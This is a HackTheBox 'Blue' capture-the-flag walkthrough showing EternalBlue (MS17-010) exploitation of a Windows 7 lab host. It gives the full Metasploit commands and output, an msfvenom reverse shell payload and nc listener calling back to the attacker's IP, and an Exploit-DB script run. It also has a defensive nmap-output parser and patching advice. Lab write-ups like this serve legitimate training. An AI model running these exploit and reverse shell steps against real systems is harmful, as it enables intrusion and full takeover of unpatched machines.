WriteUp: HackTheBox Blue

Getting back on HTB. Last time, I had to shift focus after 1 or 2 boxes and did not even write them up. Let’s see how long I’ll last this time round :). I’m basically starting from scratch now, so let’s just say this is my very first box in my list of X boxes to come. It’s a Windows machine rated easy. It runs a vulnerable SMB version, which lets us gain both user and system access.

Table of Contents

  1. Reconnaissance
  2. Enumeration
  3. Exploitation using Metasploit
  4. Exploitation without Metasploit
  5. Post Exploitation
  6. Defender’s Note

Reconnaissance

Let’s start by checking which open ports are available on the machine.

$ nmap -A -T4 -p- 10.10.10.40

The output we get:

PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49156/tcp open  msrpc        Microsoft Windows RPC
49157/tcp open  msrpc        Microsoft Windows RPC
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -12m42s, deviation: 34m36s, median: 7m15s
| smb-os-discovery: 
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: haris-PC
|   NetBIOS computer name: HARIS-PC\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2021-06-23T08:05:35+01:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-06-23T07:05:33
|_  start_date: 2021-06-23T06:57:15

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 108.15 seconds

We get a bunch of RPC ports open along with SMB. RPC is common to see alongside SMB, but let’s follow the SMB trail. The machine is running Windows 7 SP1. A quick Google search for known vulnerabilities in this version of Windows gives EternalBlue as the first hit. MS17-010 (EternalBlue) is an SMBv1 vulnerability that allowed remote code execution on unpatched Windows machines.

Enumeration

We can also use Nmap scripts to check for existing vulnerabilities on SMB.

$ nmap --script smb-vuln* -sV -v -p 139,445 10.10.10.40

The output that we get shows that the machine is indeed vulnerable to ms17-010.

PORT    STATE SERVICE      VERSION
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
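The two scans above are exactly what a defender sweeping their own estate for MS17-010 would run across many hosts. As an added example (not part of the original write-up), the Python below parses nmap’s Host script results into a triage record: which smb-vuln-* scripts reported VULNERABLE and the CVEs they cite, the OS string from smb-os-discovery, and the signing weaknesses from smb-security-mode and smb2-security-mode. The embedded NMAP_OUTPUT is a constructed, trimmed copy of this page’s output, and parse_nse/triage are hypothetical helper names.

```python
import re

# Constructed sample: the "Host script results" from the two nmap scans on
# this page, trimmed to the scripts this example reads (same NSE format).
NMAP_OUTPUT = """\
Host script results:
| smb-os-discovery: 
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
"""

# A script header is "| name: " or "|_name: value" (at most one space after
# the bar); any "|" line indented by two or more spaces belongs to the body
# of the script whose header was seen last.
HEADER = re.compile(r"^\|_? ?(?P<name>[\w-]+):\s*(?P<rest>.*)$")
BODY = re.compile(r"^\|_?\s{2,}(?P<line>\S.*)$")

def parse_nse(text):
    """Group nmap host-script output into {script_name: [body lines]}."""
    scripts, current = {}, None
    for raw in text.splitlines():
        h = HEADER.match(raw)
        if h:
            current = h.group("name")
            scripts[current] = [h.group("rest")] if h.group("rest") else []
            continue
        b = BODY.match(raw)
        if b and current is not None:
            scripts[current].append(b.group("line").strip())
    return scripts

def triage(scripts):
    """Reduce parsed scripts to a record a defender can act on."""
    report = {"os": None, "vulnerable": [], "findings": []}
    for line in scripts.get("smb-os-discovery", []):
        if line.startswith("OS: "):
            report["os"] = line[len("OS: "):]
    for name, lines in scripts.items():
        # Only smb-vuln-* scripts that explicitly report "State: VULNERABLE"
        # count; "false" and NT_STATUS_* results are not findings.
        if name.startswith("smb-vuln-") and "State: VULNERABLE" in lines:
            cves = sorted({c for l in lines for c in re.findall(r"CVE-\d{4}-\d+", l)})
            report["vulnerable"].append((name[len("smb-vuln-"):], cves))
    v1 = scripts.get("smb-security-mode", [])
    if any(l.startswith("message_signing: disabled") for l in v1):
        report["findings"].append("SMBv1 message signing disabled")
    v2 = scripts.get("smb2-security-mode", [])
    if any("enabled but not required" in l for l in v2):
        report["findings"].append("SMBv2 message signing not required")
    return report

if __name__ == "__main__":
    for key, value in triage(parse_nse(NMAP_OUTPUT)).items():
        print(f"{key}: {value}")
```

Feed it the saved output of `nmap --script smb-vuln* ... -oN scan.txt` per host and the vulnerable list is the patch queue; the findings list is the signing hardening backlog.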

Exploitation using Metasploit

We can first try pwning this using Metasploit. Does Metasploit have an MS17-010 exploit module available?

$ msfconsole
msf6 > search ms17-010

Matching Modules
================

   #  Name                                           Disclosure Date  Rank     Check  Description
   -  ----                                           ---------------  ----     -----  -----------
   0  auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   1  auxiliary/scanner/smb/smb_ms17_010                              normal   No     MS17-010 SMB RCE Detection
   2  exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   3  exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
   4  exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   5  exploit/windows/smb/smb_doublepulsar_rce       2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution


Interact with a module by name or index. For example info 5, use 5 or use exploit/windows/smb/smb_doublepulsar_rce

Indeed it does. We see a scanner (1) and a couple of exploits (2-4).

Let’s first verify that the vulnerability does indeed exist on the machine. For that, we will use the scanner module. Let’s check which options are required to use this module.

msf6 > use auxiliary/scanner/smb/smb_ms17_010 
msf6 auxiliary(scanner/smb/smb_ms17_010) > options

Module options (auxiliary/scanner/smb/smb_ms17_010):

   Name         Current Setting                                                 Required  Description
   ----         ---------------                                                 --------  -----------
   CHECK_ARCH   true                                                            no        Check for architecture on vulnerable hosts
   CHECK_DOPU   true                                                            no        Check for DOUBLEPULSAR on vulnerable hosts
   CHECK_PIPE   false                                                           no        Check for named pipe on vulnerable hosts
   NAMED_PIPES  /usr/share/metasploit-framework/data/wordlists/named_pipes.txt  yes       List of named pipes to check
   RHOSTS                                                                       yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT        445                                                             yes       The SMB service port (TCP)
   SMBDomain    .                                                               no        The Windows domain to use for authentication
   SMBPass                                                                      no        The password for the specified username
   SMBUser                                                                      no        The username to authenticate as
   THREADS      1                                                               yes       The number of concurrent threads (max one per host)

Four options are required: RHOSTS, RPORT, NAMED_PIPES and THREADS. Three of them already have defaults, so we only need to set RHOSTS.

msf6 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 10.10.10.40
rhosts => 10.10.10.40

Let’s also double check the NAMED_PIPES path, as that option is required. The file exists and contains the default list of pipes.

$ cat /usr/share/metasploit-framework/data/wordlists/named_pipes.txt
netlogon
lsarpc
samr
browser
atsvc
DAV RPC SERVICE
epmapper
eventlog
InitShutdown
keysvc
lsass
LSM_API_service
ntsvcs
plugplay
protected_storage
router
SapiServerPipeS-1-5-5-0-70123
scerpc
srvsvc
tapsrv
trkwks
W32TIME_ALT
wkssvc
PIPE_EVENTROOT\CIMV2SCM EVENT PROVIDER
db2remotecmd

Let’s now run the scanner module.

msf6 auxiliary(scanner/smb/smb_ms17_010) > run

[+] 10.10.10.40:445       - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.10.40:445       - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

The output shows that the machine is likely vulnerable to MS17-010. With that verified, we can use an exploit module against it. As this is a Windows 7 machine, we can try module 2 or 4 from the search results; module 3 is specific to Windows 8+. Let’s first attempt exploit module 2.

msf6 > use exploit/windows/smb/ms17_010_eternalblue
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS                          yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT          445              yes       The target port (TCP)
   SMBDomain      .                no        (Optional) The Windows domain to use for authentication
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.176.95   yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs

Defaults exist for all required options except RHOSTS. We also need to change LHOST to the IP of our VPN tunnel. Let’s double check the tunnel’s IP address.

$ ifconfig
tun0: flags=4305<UP,POINTOPOINT,RUNNING,NOARP,MULTICAST>  mtu 1500
        inet 10.10.14.6  netmask 255.255.254.0  destination 10.10.14.6
        inet6 fe80::9440:3242:5d61:5230  prefixlen 64  scopeid 0x20<link>
        inet6 dead:beef:2::1004  prefixlen 64  scopeid 0x0<global>
        unspec 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00  txqueuelen 500  (UNSPEC)
        RX packets 26  bytes 2802 (2.7 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 50  bytes 4402 (4.2 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

Let’s set the RHOSTS and LHOST then run the module.

msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 10.10.10.40
RHOSTS => 10.10.10.40
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 10.10.14.6
LHOST => 10.10.14.6
msf6 exploit(windows/smb/ms17_010_eternalblue) > run

The output that we get is as below.

[*] Started reverse TCP handler on 10.10.14.6:4444 
[*] 10.10.10.40:445 - Executing automatic check (disable AutoCheck to override)
[*] 10.10.10.40:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.10.40:445       - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.10.40:445       - Scanned 1 of 1 hosts (100% complete)
[+] 10.10.10.40:445 - The target is vulnerable.
[*] 10.10.10.40:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.10.40:445       - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.10.40:445       - Scanned 1 of 1 hosts (100% complete)
[*] 10.10.10.40:445 - Connecting to target for exploitation.
[+] 10.10.10.40:445 - Connection established for exploitation.
[+] 10.10.10.40:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.10.40:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.10.40:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 10.10.10.40:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] 10.10.10.40:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1      
[+] 10.10.10.40:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.10.40:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.10.40:445 - Sending all but last fragment of exploit packet
[*] 10.10.10.40:445 - Starting non-paged pool grooming
[+] 10.10.10.40:445 - Sending SMBv2 buffers
[+] 10.10.10.40:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.10.40:445 - Sending final SMBv2 buffers.
[*] 10.10.10.40:445 - Sending last fragment of exploit packet!
[*] 10.10.10.40:445 - Receiving response from exploit packet
[+] 10.10.10.40:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.10.40:445 - Sending egg to corrupted connection.
[*] 10.10.10.40:445 - Triggering free of corrupted buffer.
[*] Sending stage (200262 bytes) to 10.10.10.40
[*] Meterpreter session 1 opened (10.10.14.6:4444 -> 10.10.10.40:49158) at 2021-06-23 09:37:22 +0100
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
meterpreter > 

From the output, we see “ETERNALBLUE overwrite completed successfully”. Let’s now drop into a shell on the pwned computer.

meterpreter > shell
Process 540 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

We see that we are “nt authority\system” on the machine. Now, let’s look for the flags. We can go to the root of C: and check the Users and Administrator folders.

C:\Windows\system32>cd ..\..
cd ..\..

C:\>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is A0EF-1911

 Directory of C:\

14/07/2009  04:20    <DIR>          PerfLogs
24/12/2017  03:23    <DIR>          Program Files
14/07/2017  17:58    <DIR>          Program Files (x86)
14/07/2017  14:48    <DIR>          Share
21/07/2017  07:56    <DIR>          Users
15/01/2021  11:42    <DIR>          Windows
               0 File(s)              0 bytes
               6 Dir(s)  17,256,079,360 bytes free

C:\>cd Users
cd Users

C:\Users>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is A0EF-1911

 Directory of C:\Users

21/07/2017  07:56    <DIR>          .
21/07/2017  07:56    <DIR>          ..
21/07/2017  07:56    <DIR>          Administrator
14/07/2017  14:45    <DIR>          haris
12/04/2011  08:51    <DIR>          Public
               0 File(s)              0 bytes
               5 Dir(s)  17,256,079,360 bytes free

We see that we have a user called “Haris” and an “Administrator”.

Exploitation without Metasploit

Before we get the flags, let’s try to exploit the box without using Metasploit.

We can search for an exploit from Exploit DB.

$ searchsploit --id ms17-010

We get the output seen below.

We pick an exploit that works on Windows 7 machines. I’ll go with 42315.

We can copy the exploit to our working folder using searchsploit’s mirror option.

$ searchsploit -m 42315
  Exploit: Microsoft Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)
      URL: https://www.exploit-db.com/exploits/42315
     Path: /usr/share/exploitdb/exploits/windows/remote/42315.py
File Type: Python script, ASCII text executable, with CRLF line terminators

Copied to: /home/XXXX/Downloads/42315.py

When we read the downloaded source file, a couple of things come up. First, we need to download the mysmb.py file from the URL given in the script.

$ wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42315.py
HTTP request sent, awaiting response... 200 OK
Length: 16669 (16K) [text/plain]
Saving to: ‘42315.py.1’

42315.py.1                                    100%[==============================================================================================>]  16.28K  --.-KB/s    in 0.002s  

2021-06-23 11:56:02 (6.76 MB/s) - ‘42315.py.1’ saved [16669/16669]

Let’s rename the file accordingly.

$ mv 42315.py.1 mysmb.py

We also see in the exploit that we need a username and password.

Let’s check to see which logins are allowed on the Windows machine.

$ enum4linux -a 10.10.10.40
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Wed Jun 23 12:04:37 2021

 ========================== 
|    Target Information    |
 ========================== 
Target ........... 10.10.10.40
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

We see that “administrator” and “guest” are allowed. Let’s first try with guest, since guest accounts are normally weaker targets. We need to edit the script and insert the username; we don’t have a password.

The same section of the script also tells us to create a reverse shell payload, e.g. with “msfvenom” as in the example given.

$ msfvenom -p windows/shell_reverse_tcp -f exe LHOST=10.10.14.6 LPORT=4444 > eternal-blue.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes

Let’s now add the location of the payload to the exploit code.

We are now ready. Let’s set up a listener on our machine.

$ nc -nlvp 4444

It’s now time to run the exploit.

$ python 42315.py 10.10.10.40
Target OS: Windows 7 Professional 7601 Service Pack 1
Using named pipe: samr
Target is 64 bit
Got frag size: 0x10
GROOM_POOL_SIZE: 0x5030
BRIDE_TRANS_SIZE: 0xfa0
CONNECTION: 0xfffffa80045f5920
SESSION: 0xfffff8a002c22de0
FLINK: 0xfffff8a002e6d088
InParam: 0xfffff8a002e6715c
MID: 0x3803
success controlling groom transaction
modify trans1 struct for arbitrary read/write
make this SMB session to be SYSTEM
overwriting session security context
creating file c:\pwned.txt on the target
Opening SVCManager on 10.10.10.40.....
Creating service RZsc.....
Starting service RZsc.....
The NETBIOS connection with the remote host timed out.
Removing service RZsc.....
ServiceExec Error on: 10.10.10.40
nca_s_proto_error
Done

Despite the timeout error, when we go back to the listener terminal we see that a session with the host is now set up as system.

$ nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.10.40] 49158
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

Post Exploitation

The user flag is normally located on the desktop of a normal user (C:\Documents and Settings\User\Desktop). In this case, we need to go to the desktop of user “haris”. Once in the directory, we see the “user.txt” file, which we can read with the “type” command.

C:\Users\haris>cd Desktop
cd Desktop

C:\Users\haris\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is A0EF-1911

 Directory of C:\Users\haris\Desktop

24/12/2017  03:23    <DIR>          .
24/12/2017  03:23    <DIR>          ..
21/07/2017  07:54                32 user.txt
               1 File(s)             32 bytes
               2 Dir(s)  17,256,079,360 bytes free

C:\Users\haris\Desktop>type user.txt
type user.txt
4c546XXXXXXXXXXXXXXXXeea9

The root flag is normally located on the desktop of Administrator (C:\Documents and Settings\Administrator\Desktop). Once in the directory, we see the “root.txt” file, which we can read with the “type” command.

C:\Users\Administrator>cd Desktop
cd Desktop

C:\Users\Administrator\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is A0EF-1911

 Directory of C:\Users\Administrator\Desktop

24/12/2017  03:22    <DIR>          .
24/12/2017  03:22    <DIR>          ..
21/07/2017  07:57                32 root.txt
               1 File(s)             32 bytes
               2 Dir(s)  17,256,079,360 bytes free

C:\Users\Administrator\Desktop>type root.txt
type root.txt
ff548eXXXXXXXXXXXXXXXXXX4e717

Defender’s Note

  1. SMBv1 is known to suffer from a bunch of vulnerabilities that are easily exploited in the wild. You are better off not using it at all; use the latest version (SMBv3) wherever possible.
  2. Patch systems in a timely manner. The vulnerability exploited here was patched in 2017. If your systems are still unpatched, you’re simply asking for trouble.
  3. Older versions of Windows may lack support for newer protocols (e.g. SMBv3). Getting rid of old Windows versions in your environment makes attackers’ lives a little more complicated.
  4. We were able to get in using a guest user. Harden accounts and remove unnecessary users from host machines.

That’s all for now. Adios!
